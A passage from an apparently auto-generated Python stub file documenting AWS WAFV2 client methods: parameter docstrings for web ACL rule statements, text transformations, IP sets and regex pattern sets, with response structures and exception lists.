limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.\n\n\n\nTextTransformations (list) -- [REQUIRED]Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nText transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.\n\nPriority (integer) -- [REQUIRED]Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.\n\nType (string) -- [REQUIRED]You can specify the following transformation types:\n\nCMD_LINE\nWhen you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:\n\nDelete the following characters: ' \' ^\nDelete spaces before the following characters: / (\nReplace the following characters with a space: , ;\nReplace multiple spaces with one space\nConvert uppercase letters (A-Z) to lowercase (a-z)\n\n\nCOMPRESS_WHITE_SPACE\nUse this option to replace the following characters with a space character (decimal 32):\n\nf, formfeed, decimal 12\nt, tab, decimal 9\nn, newline, decimal 10\nr, carriage return, decimal 13\nv, vertical tab, decimal 11\nnon-breaking space, decimal 160\n\n\nCOMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE\n\nUse this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:\n\nReplaces (ampersand)quot; with '\nReplaces (ampersand)nbsp; with a non-breaking space, decimal 160\nReplaces (ampersand)lt; with a 'less than' symbol\nReplaces (ampersand)gt; with >\nReplaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters\nReplaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters\n\n\nLOWERCASE\nUse this option to convert uppercase letters (A-Z) to lowercase (a-z).\n\nURL_DECODE\nUse this option to decode a URL-encoded value.\n\nNONE\nSpecify NONE if you don\'t want any text transformations.\n\n\n\n\n\n\n\nXssMatchStatement (dict) --A rule statement that defines a cross-site scripting (XSS) match search for AWS WAF to apply to web requests. XSS attacks are those where the attacker uses vulnerabilities in a benign website as a vehicle to inject malicious client-site scripts into other legitimate web browsers. The XSS match statement provides the location in requests that you want AWS WAF to search and text transformations to use on the search area before AWS WAF searches for character sequences that are likely to be malicious strings.\n\nFieldToMatch (dict) -- [REQUIRED]The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.\n\n\n\nTextTransformations (list) -- [REQUIRED]Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nText transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.\n\nPriority (integer) -- [REQUIRED]Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.\n\nType (string) -- [REQUIRED]You can specify the following transformation types:\n\nCMD_LINE\nWhen you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:\n\nDelete the following characters: ' \' ^\nDelete spaces before the following characters: / (\nReplace the following characters with a space: , ;\nReplace multiple spaces with one space\nConvert uppercase letters (A-Z) to lowercase (a-z)\n\n\nCOMPRESS_WHITE_SPACE\nUse this option to replace the following characters with a space character (decimal 32):\n\nf, formfeed, decimal 12\nt, tab, decimal 9\nn, newline, decimal 10\nr, carriage return, decimal 13\nv, vertical tab, decimal 11\nnon-breaking space, decimal 160\n\n\nCOMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE\n\nUse this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:\n\nReplaces (ampersand)quot; with '\nReplaces (ampersand)nbsp; with a non-breaking space, decimal 160\nReplaces (ampersand)lt; with a 'less than' symbol\nReplaces (ampersand)gt; with >\nReplaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters\nReplaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters\n\n\nLOWERCASE\nUse this option to convert uppercase letters (A-Z) to lowercase (a-z).\n\nURL_DECODE\nUse this option to decode a URL-encoded value.\n\nNONE\nSpecify NONE if you don\'t want any text transformations.\n\n\n\n\n\n\n\nSizeConstraintStatement (dict) --A rule statement that compares a number of bytes against the size of a request component, using a comparison operator, such as greater than (>) or less than (<). For example, you can use a size constraint statement to look for query strings that are longer than 100 bytes.\nIf you configure AWS WAF to inspect the request body, AWS WAF inspects only the first 8192 bytes (8 KB). If the request body for your web requests never exceeds 8192 bytes, you can create a size constraint condition and block requests that have a request body greater than 8192 bytes.\nIf you choose URI for the value of Part of the request to filter on, the slash (/) in the URI counts as one character. For example, the URI /logo.jpg is nine characters long.\n\nFieldToMatch (dict) -- [REQUIRED]The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.\n\n\n\nComparisonOperator (string) -- [REQUIRED]The operator to use to compare the request part to the size setting.\n\nSize (integer) -- [REQUIRED]The size, in byte, to compare to the request part, after any transformations.\n\nTextTransformations (list) -- [REQUIRED]Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nText transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.\n\nPriority (integer) -- [REQUIRED]Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.\n\nType (string) -- [REQUIRED]You can specify the following transformation types:\n\nCMD_LINE\nWhen you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:\n\nDelete the following characters: ' \' ^\nDelete spaces before the following characters: / (\nReplace the following characters with a space: , ;\nReplace multiple spaces with one space\nConvert uppercase letters (A-Z) to lowercase (a-z)\n\n\nCOMPRESS_WHITE_SPACE\nUse this option to replace the following characters with a space character (decimal 32):\n\nf, formfeed, decimal 12\nt, tab, decimal 9\nn, newline, decimal 10\nr, carriage return, decimal 13\nv, vertical tab, decimal 11\nnon-breaking space, decimal 160\n\n\nCOMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE\n\nUse this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:\n\nReplaces (ampersand)quot; with '\nReplaces (ampersand)nbsp; with a non-breaking space, decimal 160\nReplaces (ampersand)lt; with a 'less than' symbol\nReplaces (ampersand)gt; with >\nReplaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters\nReplaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters\n\n\nLOWERCASE\nUse this option to convert uppercase letters (A-Z) to lowercase (a-z).\n\nURL_DECODE\nUse this option to decode a URL-encoded value.\n\nNONE\nSpecify NONE if you don\'t want any text transformations.\n\n\n\n\n\n\n\nGeoMatchStatement (dict) --A rule statement used to identify web requests based on country of origin.\n\nCountryCodes (list) --An array of two-character country codes, for example, [ 'US', 'CN' ] , from the alpha-2 country ISO codes of the ISO 3166 international standard.\n\n(string) --\n\n\n\n\nRuleGroupReferenceStatement (dict) --A rule statement used to run the rules that are defined in a RuleGroup . To use this, create a rule group with your rules, then provide the ARN of the rule group in this statement.\nYou cannot nest a RuleGroupReferenceStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.\n\nARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the entity.\n\nExcludedRules (list) --The names of rules that are in the referenced rule group, but that you want AWS WAF to exclude from processing for this rule statement.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nSpecifies a single rule to exclude from the rule group. Excluding a rule overrides its action setting for the rule group in the web ACL, setting it to COUNT . This effectively excludes the rule from acting on web requests.\n\nName (string) -- [REQUIRED]The name of the rule to exclude.\n\n\n\n\n\n\n\nIPSetReferenceStatement (dict) --A rule statement used to detect web requests coming from particular IP addresses or address ranges. To use this, create an IPSet that specifies the addresses you want to detect, then use the ARN of that set in this statement. To create an IP set, see CreateIPSet .\nEach IP set rule statement references an IP set. You create and maintain the set independent of your rules. This allows you to use the single set in multiple rules. When you update the referenced set, AWS WAF automatically updates all rules that reference it.\n\nARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the IPSet that this statement references.\n\n\n\nRegexPatternSetReferenceStatement (dict) --A rule statement used to search web request components for matches with regular expressions. To use this, create a RegexPatternSet that specifies the expressions that you want to detect, then use the ARN of that set in this statement. A web request matches the pattern set rule statement if the request component matches any of the patterns in the set. To create a regex pattern set, see CreateRegexPatternSet .\nEach regex pattern set rule statement references a regex pattern set. You create and maintain the set independent of your rules. This allows you to use the single set in multiple rules. When you update the referenced set, AWS WAF automatically updates all rules that reference it.\n\nARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the RegexPatternSet that this statement references.\n\nFieldToMatch (dict) -- [REQUIRED]The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.\n\n\n\nTextTransformations (list) -- [REQUIRED]Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nText transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.\n\nPriority (integer) -- [REQUIRED]Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.\n\nType (string) -- [REQUIRED]You can specify the following transformation types:\n\nCMD_LINE\nWhen you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:\n\nDelete the following characters: ' \' ^\nDelete spaces before the following characters: / (\nReplace the following characters with a space: , ;\nReplace multiple spaces with one space\nConvert uppercase letters (A-Z) to lowercase (a-z)\n\n\nCOMPRESS_WHITE_SPACE\nUse this option to replace the following characters with a space character (decimal 32):\n\nf, formfeed, decimal 12\nt, tab, decimal 9\nn, newline, decimal 10\nr, carriage return, decimal 13\nv, vertical tab, decimal 11\nnon-breaking space, decimal 160\n\n\nCOMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE\n\nUse this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:\n\nReplaces (ampersand)quot; with '\nReplaces (ampersand)nbsp; with a non-breaking space, decimal 160\nReplaces (ampersand)lt; with a 'less than' symbol\nReplaces (ampersand)gt; with >\nReplaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters\nReplaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters\n\n\nLOWERCASE\nUse this option to convert uppercase letters (A-Z) to lowercase (a-z).\n\nURL_DECODE\nUse this option to decode a URL-encoded value.\n\nNONE\nSpecify NONE if you don\'t want any text transformations.\n\n\n\n\n\n\n\nRateBasedStatement (dict) --A rate-based rule tracks the rate of requests for each originating IP address, and triggers the rule action when the rate exceeds a limit that you specify on the number of requests in any 5-minute time span. You can use this to put a temporary block on requests from an IP address that is sending excessive requests.\nWhen the rule action triggers, AWS WAF blocks additional requests from the IP address until the request rate falls below the limit.\nYou can optionally nest another statement inside the rate-based statement, to narrow the scope of the rule so that it only counts requests that match the nested statement. For example, based on recent requests that you have seen from an attacker, you might create a rate-based rule with a nested AND rule statement that contains the following nested statements:\n\nAn IP match statement with an IP set that specified the address 192.0.2.44.\nA string match statement that searches in the User-Agent header for the string BadBot.\n\nIn this rate-based rule, you also define a rate limit. For this example, the rate limit is 1,000. Requests that meet both of the conditions in the statements are counted. If the count exceeds 1,000 requests per five minutes, the rule action triggers. Requests that do not meet both conditions are not counted towards the rate limit and are not affected by this rule.\nYou cannot nest a RateBasedStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.\n\nLimit (integer) -- [REQUIRED]The limit on requests per 5-minute period for a single originating IP address. If the statement includes a ScopDownStatement , this limit is applied only to the requests that match the statement.\n\nAggregateKeyType (string) -- [REQUIRED]Setting that indicates how to aggregate the request counts. Currently, you must set this to IP . The request counts are aggregated on IP addresses.\n\nScopeDownStatement (dict) --An optional nested statement that narrows the scope of the rate-based statement to matching web requests. This can be any nestable statement, and you can nest statements at any level below this scope-down statement.\n\n\n\nAndStatement (dict) --A logical rule statement used to combine other rule statements with AND logic. You provide more than one Statement within the AndStatement .\n\nStatements (list) -- [REQUIRED]The statements to combine with AND logic. You can use any statements that can be nested.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nThe processing guidance for a Rule , used by AWS WAF to determine whether a web request matches the rule.\n\n\n\n\n\nOrStatement (dict) --A logical rule statement used to combine other rule statements with OR logic. You provide more than one Statement within the OrStatement .\n\nStatements (list) -- [REQUIRED]The statements to combine with OR logic. You can use any statements that can be nested.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nThe processing guidance for a Rule , used by AWS WAF to determine whether a web request matches the rule.\n\n\n\n\n\nNotStatement (dict) --A logical rule statement used to negate the results of another rule statement. You provide one Statement within the NotStatement .\n\nStatement (dict) --The statement to negate. You can use any statement that can be nested.\n\n\n\nManagedRuleGroupStatement (dict) --A rule statement used to run the rules that are defined in a managed rule group. To use this, provide the vendor name and the name of the rule group in this statement. You can retrieve the required names by calling ListAvailableManagedRuleGroups .\nYou can\'t nest a ManagedRuleGroupStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.\n\nVendorName (string) -- [REQUIRED]The name of the managed rule group vendor. You use this, along with the rule group name, to identify the rule group.\n\nName (string) -- [REQUIRED]The name of the managed rule group. You use this, along with the vendor name, to identify the rule group.\n\nExcludedRules (list) --The rules whose actions are set to COUNT by the web ACL, regardless of the action that is set on the rule. This effectively excludes the rule from acting on web requests.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nSpecifies a single rule to exclude from the rule group. Excluding a rule overrides its action setting for the rule group in the web ACL, setting it to COUNT . This effectively excludes the rule from acting on web requests.\n\nName (string) -- [REQUIRED]The name of the rule to exclude.\n\n\n\n\n\n\n\n\n\nAction (dict) --The action that AWS WAF should take on a web request when it matches the rule statement. Settings at the web ACL level can override the rule action setting.\nThis is used only for rules whose statements do not reference a rule group. Rule statements that reference a rule group include RuleGroupReferenceStatement and ManagedRuleGroupStatement .\nYou must specify either this Action setting or the rule OverrideAction setting, but not both:\n\nIf the rule statement does not reference a rule group, use this rule action setting and not the rule override action setting.\nIf the rule statement references a rule group, use the override action setting and not this action setting.\n\n\nBlock (dict) --Instructs AWS WAF to block the web request.\n\nAllow (dict) --Instructs AWS WAF to allow the web request.\n\nCount (dict) --Instructs AWS WAF to count the web request and allow it.\n\n\n\nOverrideAction (dict) --The override action to apply to the rules in a rule group. Used only for rule statements that reference a rule group, like RuleGroupReferenceStatement and ManagedRuleGroupStatement .\nSet the override action to none to leave the rule actions in effect. Set it to count to only count matches, regardless of the rule action settings.\nIn a Rule , you must specify either this OverrideAction setting or the rule Action setting, but not both:\n\nIf the rule statement references a rule group, use this override action setting and not the action setting.\nIf the rule statement does not reference a rule group, use the rule action setting and not this rule override action setting.\n\n\nCount (dict) --Override the rule action setting to count.\n\nNone (dict) --Don\'t override the rule action setting.\n\n\n\nVisibilityConfig (dict) -- [REQUIRED]Defines and enables Amazon CloudWatch metrics and web request sample collection.\n\nSampledRequestsEnabled (boolean) -- [REQUIRED]A boolean indicating whether AWS WAF should store a sampling of the web requests that match the rules. You can view the sampled requests through the AWS WAF console.\n\nCloudWatchMetricsEnabled (boolean) -- [REQUIRED]A boolean indicating whether the associated resource sends metrics to CloudWatch. For the list of available metrics, see AWS WAF Metrics .\n\nMetricName (string) -- [REQUIRED]A name of the CloudWatch metric. The name can contain only alphanumeric characters (A-Z, a-z, 0-9), with length from one to 128 characters. It can\'t contain whitespace or metric names reserved for AWS WAF, for example 'All' and 'Default_Action.' You can\'t change a MetricName after you create a VisibilityConfig .\n\n\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'Capacity': 123
}
Response Structure
(dict) --
Capacity (integer) --
The capacity required by the rules and scope.
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFLimitsExceededException
WAFV2.Client.exceptions.WAFInvalidResourceException
WAFV2.Client.exceptions.WAFUnavailableEntityException
WAFV2.Client.exceptions.WAFSubscriptionNotFoundException
:return: {
'Capacity': 123
}
:returns:
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFLimitsExceededException
WAFV2.Client.exceptions.WAFInvalidResourceException
WAFV2.Client.exceptions.WAFUnavailableEntityException
WAFV2.Client.exceptions.WAFSubscriptionNotFoundException
"""
pass
def create_ip_set(Name=None, Scope=None, Description=None, IPAddressVersion=None, Addresses=None, Tags=None):
"""
Creates an IPSet , which you use to identify web requests that originate from specific IP addresses or ranges of IP addresses. For example, if you\'re receiving a lot of requests from a ranges of IP addresses, you can configure AWS WAF to block them using an IPSet that lists those IP addresses.
See also: AWS API Documentation
Exceptions
:example: response = client.create_ip_set(
Name='string',
Scope='CLOUDFRONT'|'REGIONAL',
Description='string',
IPAddressVersion='IPV4'|'IPV6',
Addresses=[
'string',
],
Tags=[
{
'Key': 'string',
'Value': 'string'
},
]
)
:type Name: string
:param Name: [REQUIRED]\nThe name of the IP set. You cannot change the name of an IPSet after you create it.\n
:type Scope: string
:param Scope: [REQUIRED]\nSpecifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
:type Description: string
:param Description: A description of the IP set that helps with identification. You cannot change the description of an IP set after you create it.
:type IPAddressVersion: string
:param IPAddressVersion: [REQUIRED]\nSpecify IPV4 or IPV6.\n
:type Addresses: list
:param Addresses: [REQUIRED]\nContains an array of strings that specify one or more IP addresses or blocks of IP addresses in Classless Inter-Domain Routing (CIDR) notation. AWS WAF supports all address ranges for IP versions IPv4 and IPv6.\nExamples:\n\nTo configure AWS WAF to allow, block, or count requests that originated from the IP address 192.0.2.44, specify 192.0.2.44/32 .\nTo configure AWS WAF to allow, block, or count requests that originated from IP addresses from 192.0.2.0 to 192.0.2.255, specify 192.0.2.0/24 .\nTo configure AWS WAF to allow, block, or count requests that originated from the IP address 1111:0000:0000:0000:0000:0000:0000:0111, specify 1111:0000:0000:0000:0000:0000:0000:0111/128 .\nTo configure AWS WAF to allow, block, or count requests that originated from IP addresses 1111:0000:0000:0000:0000:0000:0000:0000 to 1111:0000:0000:0000:ffff:ffff:ffff:ffff, specify 1111:0000:0000:0000:0000:0000:0000:0000/64 .\n\nFor more information about CIDR notation, see the Wikipedia entry Classless Inter-Domain Routing .\n\n(string) --\n\n
:type Tags: list
:param Tags: An array of key:value pairs to associate with the resource.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nA collection of key:value pairs associated with an AWS resource. The key:value pair can be anything you define. Typically, the tag key represents a category (such as 'environment') and the tag value represents a specific value within that category (such as 'test,' 'development,' or 'production'). You can add up to 50 tags to each AWS resource.\n\nKey (string) -- [REQUIRED]Part of the key:value pair that defines a tag. You can use a tag key to describe a category of information, such as 'customer.' Tag keys are case-sensitive.\n\nValue (string) -- [REQUIRED]Part of the key:value pair that defines a tag. You can use a tag value to describe a specific value within a category, such as 'companyA' or 'companyB.' Tag values are case-sensitive.\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'Summary': {
'Name': 'string',
'Id': 'string',
'Description': 'string',
'LockToken': 'string',
'ARN': 'string'
}
}
Response Structure
(dict) --
Summary (dict) --
High-level information about an IPSet , returned by operations like create and list. This provides information like the ID, that you can use to retrieve and manage an IPSet , and the ARN, that you provide to the IPSetReferenceStatement to use the address set in a Rule .
Name (string) --
The name of the IP set. You cannot change the name of an IPSet after you create it.
Id (string) --
A unique identifier for the set. This ID is returned in the responses to create and list commands. You provide it to operations like update and delete.
Description (string) --
A description of the IP set that helps with identification. You cannot change the description of an IP set after you create it.
LockToken (string) --
A token used for optimistic locking. AWS WAF returns a token to your get and list requests, to mark the state of the entity at the time of the request. To make changes to the entity associated with the token, you provide the token to operations like update and delete. AWS WAF uses the token to ensure that no changes have been made to the entity since you last retrieved it. If a change has been made, the update fails with a WAFOptimisticLockException . If this happens, perform another get, and use the new token returned by that operation.
ARN (string) --
The Amazon Resource Name (ARN) of the entity.
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFDuplicateItemException
WAFV2.Client.exceptions.WAFOptimisticLockException
WAFV2.Client.exceptions.WAFLimitsExceededException
WAFV2.Client.exceptions.WAFTagOperationException
WAFV2.Client.exceptions.WAFTagOperationInternalErrorException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {
'Summary': {
'Name': 'string',
'Id': 'string',
'Description': 'string',
'LockToken': 'string',
'ARN': 'string'
}
}
:returns:
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFDuplicateItemException
WAFV2.Client.exceptions.WAFOptimisticLockException
WAFV2.Client.exceptions.WAFLimitsExceededException
WAFV2.Client.exceptions.WAFTagOperationException
WAFV2.Client.exceptions.WAFTagOperationInternalErrorException
WAFV2.Client.exceptions.WAFInvalidOperationException
"""
pass
def create_regex_pattern_set(Name=None, Scope=None, Description=None, RegularExpressionList=None, Tags=None):
"""
Creates a RegexPatternSet , which you reference in a RegexPatternSetReferenceStatement , to have AWS WAF inspect a web request component for the specified patterns.
See also: AWS API Documentation
Exceptions
:example: response = client.create_regex_pattern_set(
Name='string',
Scope='CLOUDFRONT'|'REGIONAL',
Description='string',
RegularExpressionList=[
{
'RegexString': 'string'
},
],
Tags=[
{
'Key': 'string',
'Value': 'string'
},
]
)
:type Name: string
:param Name: [REQUIRED]\nThe name of the set. You cannot change the name after you create the set.\n
:type Scope: string
:param Scope: [REQUIRED]\nSpecifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
:type Description: string
:param Description: A description of the set that helps with identification. You cannot change the description of a set after you create it.
:type RegularExpressionList: list
:param RegularExpressionList: [REQUIRED]\nArray of regular expression strings.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nA single regular expression. This is used in a RegexPatternSet .\n\nRegexString (string) --The string representing the regular expression.\n\n\n\n\n
:type Tags: list
